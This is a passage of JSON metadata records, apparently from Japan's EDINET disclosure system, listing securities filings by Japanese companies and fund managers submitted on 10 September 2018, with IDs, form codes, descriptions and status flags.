"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 107,
"docID": "S100E2QU",
"edinetCode": "E04803",
"secCode": "97420",
"JCN": "2020001030067",
"filerName": "株式会社アイネス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 108,
"docID": "S100E1FA",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10992",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 109,
"docID": "S100E1XE",
"edinetCode": "E12425",
"secCode": null,
"JCN": "5010001048652",
"filerName": "レッグ・メイソン・アセット・マネジメント株式会社",
"fundCode": "G12779",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:34",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 110,
"docID": "S100E1FD",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11008",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:34",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 111,
"docID": "S100E1FE",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11056",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:35",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 112,
"docID": "S100E1FF",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11061",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:36",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 113,
"docID": "S100E2YY",
"edinetCode": "E00820",
"secCode": "42040",
"JCN": "1120001059650",
"filerName": "積水化学工業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:36",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 114,
"docID": "S100E1FG",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11068",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:37",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 115,
"docID": "S100E1FI",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11071",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:37",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 116,
"docID": "S100DYWA",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05468",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:38",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第22期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 117,
"docID": "S100DY70",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12401",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:38",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第3期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 118,
"docID": "S100E1FK",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11072",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:38",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 119,
"docID": "S100E2Z3",
"edinetCode": "E03945",
"secCode": "88500",
"JCN": "9010001095583",
"filerName": "スターツコーポレーション株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:38",
"docDescription": "変更報告書",
"issuerEdinetCode": "E14223",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 120,
"docID": "S100DNW0",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11824",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:39",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第17期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 121,
"docID": "S100E1FL",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11073",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:39",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 122,
"docID": "S100DYWB",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05468",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 123,
"docID": "S100E1FN",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11080",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 124,
"docID": "S100E2WE",
"edinetCode": "E11943",
"secCode": null,
"JCN": null,
"filerName": "Evo Fund",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "変更報告書",
"issuerEdinetCode": "E27615",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CTCN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 125,
"docID": "S100E2YU",
"edinetCode": "E33637",
"secCode": null,
"JCN": "6010001187433",
"filerName": "日本郵政キャピタル株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E32571",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2IZ",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 126,
"docID": "S100E2DF",
"edinetCode": "E04592",
"secCode": "96360",
"JCN": "1120001005118",
"filerName": "株式会社きんえい",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 09:40",
"docDescription": "四半期報告書-第122期第2四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 127,
"docID": "S100DY76",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12401",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFT7",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 128,
"docID": "S100E2YL",
"edinetCode": "E01841",
"secCode": "69860",
"JCN": "9040001059420",
"filerName": "双葉電子工業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:42",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第3号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 129,
"docID": "S100E2DH",
"edinetCode": "E04592",
"secCode": "96360",
"JCN": "1120001005118",
"filerName": "株式会社きんえい",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:43",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 130,
"docID": "S100DNVZ",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11824",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:45",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 131,
"docID": "S100E02M",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10224",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:47",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第9期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 132,
"docID": "S100E2DQ",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13131",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:48",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 133,
"docID": "S100E02J",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10224",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:48",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 134,
"docID": "S100E029",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10223",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:49",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第9期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 135,
"docID": "S100E2DR",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13132",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:50",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 136,
"docID": "S100E01Y",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10223",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:50",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 137,
"docID": "S100E0KK",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G03675",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:50",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 138,
"docID": "S100E0KL",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G04986",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:51",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 139,
"docID": "S100E2DP",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13133",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:51",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 140,
"docID": "S100E0KM",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G05078",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:51",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 141,
"docID": "S100E0KN",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G07714",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:52",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 142,
"docID": "S100E0KP",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G09038",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:53",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 143,
"docID": "S100E0KQ",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G09319",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:53",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 144,
"docID": "S100E0KR",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G09317",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:54",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 145,
"docID": "S100E0KS",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10004",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:54",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 146,
"docID": "S100E26U",
"edinetCode": "E03606",
"secCode": "83060",
"JCN": "4010001073486",
"filerName": "株式会社三菱UFJフィナンシャル・グループ",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:54",
"docDescription": "変更報告書",
"issuerEdinetCode": "E00784",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
